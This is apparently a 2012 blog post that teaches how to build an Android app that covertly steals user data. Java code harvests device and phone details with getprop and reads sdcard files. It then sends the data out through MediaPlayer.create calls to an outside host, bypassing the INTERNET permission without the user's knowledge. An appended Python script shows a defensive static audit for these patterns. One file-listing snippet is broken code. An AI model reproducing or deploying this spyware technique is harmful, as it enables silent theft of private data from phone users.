Tuesday, May 1, 2012

How to: Create an Android app for stealing User Info



Hi
I would like to share some notes about Android security and give some examples of how you can create an application without using or adding any permission, including android.permission.INTERNET (normally added to AndroidManifest.xml if you want your app to use an internet connection). With the functions below you will be able to send data to any server over HTTP, either to the Apache log on your server or by posting to your PHP pages. First I will show which information is available. These are the few items I know of; there may be more, still unknown, information that can be sent.

1. List of details about the user and device which can be taken, stolen and sent to remote servers.
Normally, to get some user and phone details you need the READ_PHONE_STATE permission, but if you just use the function below you will have all the information about the user and the phone (user phone number, IP, MAC address, phone country, telecom company, IMEI).

public void getprop()
{
    // Runs the getprop shell command and logs each line of its output.
    try {
        String s = "";
        Process p = Runtime.getRuntime().exec("getprop");
        BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));

        while ((s = stdInput.readLine()) != null)
        {
            Log.i("User Information :", "getprop" + s);
        }
    }
    catch (IOException e) {
    }
}

2. If you know how to list installed apps, you can use the PackageManager for Android and get the list of apps installed on the phone.

3. You can also scan the sdcard and other phone files and check for text files.

Listing available files

public void listfiles()
{
    // Opens the path built from "ls " + the external storage directory
    // as a file and logs each line read from it.
    try {
        File f = new File("ls " + Environment.getExternalStorageDirectory());
        FileInputStream fileis = new FileInputStream(f);
        BufferedReader buf = new BufferedReader(new InputStreamReader(fileis));
        String readString = new String();

        while ((readString = buf.readLine()) != null)
        {
            Log.i("Directories and Files: ", readString);
        }
    }
    catch (IOException e) {
    }
}

3.a Reading a single file on the sdcard

public void readsdcardfile()
{
    // Reads one named file from external storage and logs it line by line.
    try {
        File f = new File(Environment.getExternalStorageDirectory() + "/filetoget.txt");
        FileInputStream fileIS = new FileInputStream(f);
        BufferedReader buf = new BufferedReader(new InputStreamReader(fileIS));
        String readString = new String();

        while ((readString = buf.readLine()) != null)
        {
            Log.i("file: ", readString);
        }
    }
    catch (IOException e) {
    }
}

Basically, you can first list any text files and then read all of them.

And finally the magic part: OK, we have all the information, but how do we send it without the user's knowledge and harvest some data?

This trick is very simple. First create your strings from the information described above which you want to send; then I will show you how to send them.
Using this single line of code you will be able to connect to any HTTP page and send your previously created strings about phone and user details or text files.

MediaPlayer.create(this, Uri.parse("http://www.kislaybhardwaj.com/userDetails"+PhoneDetails+FileDetails+InstalledAppsDetails));

How does this send the information?
When you call the static function MediaPlayer.create, you are normally expected to provide a video or audio file link for streaming. You do not have to: you can pass any URL and it will still connect. Even if the link does not exist on the server, you will have the information. It will be stored in your Apache server logs, because you have just requested a non-existing file on the server with the user details and the other data in the URL.

You can also create a PHP page and try to post your data.
A PHP post page should probably work as below (I have tested this one but assuming it might just work).

MediaPlayer.create(this, Uri.parse("http://www.kislaybhardwaj.com/getinfo.php?details&"+userDetails+PhoneDetails+FileDetails+InstalledAppsDetails));

The main trick of this tutorial is that, without using a single permission in your AndroidManifest.xml file, you will still be able to send data to any server.
With a single line of code you request a non-existing page on your website and the request is logged in your Apache server logs, or, if you have a PHP post file, you can print it on your page or store it in your database.

MediaPlayer.create(this, Uri.parse("http://www.kislaybhardwaj.com/"+mydetailstosendString));
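
For anyone reviewing apps rather than writing them, the pattern above can be checked for statically. The following is an added example, not part of the original post: a small Python audit over an app's manifest and decompiled Java sources that flags the calls shown in this post and rates a MediaPlayer URL fetch as high when the manifest declares no android.permission.INTERNET and data is concatenated onto the URL. The rule names, severity labels and the sample app are assumptions made up for the illustration.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# Line patterns for the three calls shown in this post (hypothetical rule names).
RULES = {
    "media-url-fetch": re.compile(r'MediaPlayer\.create\s*\([^;]*Uri\.parse\s*\(\s*"https?://'),
    "shell-getprop": re.compile(r'Runtime\.getRuntime\(\)\.exec\s*\(\s*"getprop"'),
    "external-storage-read": re.compile(r'Environment\.getExternalStorageDirectory\s*\('),
}
# A URL literal followed by '+' means runtime data is appended to the request.
URL_CONCAT = re.compile(r'Uri\.parse\s*\(\s*"https?://[^"]*"\s*\+')

def declared_permissions(manifest_xml):
    """Return the <uses-permission> names declared in an AndroidManifest.xml string."""
    root = ET.fromstring(manifest_xml)
    return {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}

def severity(rule, line, has_internet):
    """Network use that the manifest does not announce is the strongest signal."""
    if rule != "media-url-fetch" or has_internet:
        return "review"
    return "high" if URL_CONCAT.search(line) else "medium"

def audit(manifest_xml, sources):
    """Return (file, line_no, rule, severity) findings for decompiled Java sources."""
    has_internet = "android.permission.INTERNET" in declared_permissions(manifest_xml)
    findings = []
    for name, text in sources.items():
        for no, line in enumerate(text.splitlines(), 1):
            for rule, pattern in RULES.items():
                if pattern.search(line):
                    findings.append((name, no, rule, severity(rule, line, has_internet)))
    return findings

# Constructed sample input: a manifest with no permissions and one source file.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.flashlight">
  <application android:label="Flashlight"/>
</manifest>"""
SAMPLE_SOURCES = {"Main.java": '''Process p = Runtime.getRuntime().exec("getprop");
File f = new File(Environment.getExternalStorageDirectory()+"/notes.txt");
MediaPlayer.create(this, Uri.parse("http://collector.example/u"+details));
MediaPlayer.create(this, R.raw.click);
'''}

if __name__ == "__main__":
    for finding in audit(SAMPLE_MANIFEST, SAMPLE_SOURCES):
        print(finding)
```

The patterns are line-based, so a call split across several lines or built through intermediate variables needs a real parser or bytecode-level analysis to catch.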

Please use this wisely and for training purposes only, and take it as an example of how Android security is actually vulnerable.

 

The Hacker News